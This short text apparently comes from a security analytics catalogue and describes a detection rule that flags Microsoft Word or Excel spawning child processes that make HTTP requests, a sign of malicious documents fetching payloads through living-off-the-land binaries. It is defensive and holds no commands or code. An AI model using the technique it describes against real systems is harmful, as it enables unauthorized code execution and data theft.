The analytic targets instances where Office applications, specifically Microsoft Word and Excel, spawn child processes that initiate HTTP or HTTPS requests. This behavior is commonly associated with malicious documents attempting to download and execute payloads using living-off-the-land binaries (LOLBins). By focusing on the creation of processes and excluding major browsers from detection, this rule aims to identify potential threats posed by Office applications under malicious use. To function, the rule utilizes data from Endpoint Detection and Response (EDR) systems, examining process creation events and correlating them with specific patterns indicative of malicious intent. Successful detection can prevent unauthorized code execution and data exfiltration risks associated with compromised documents.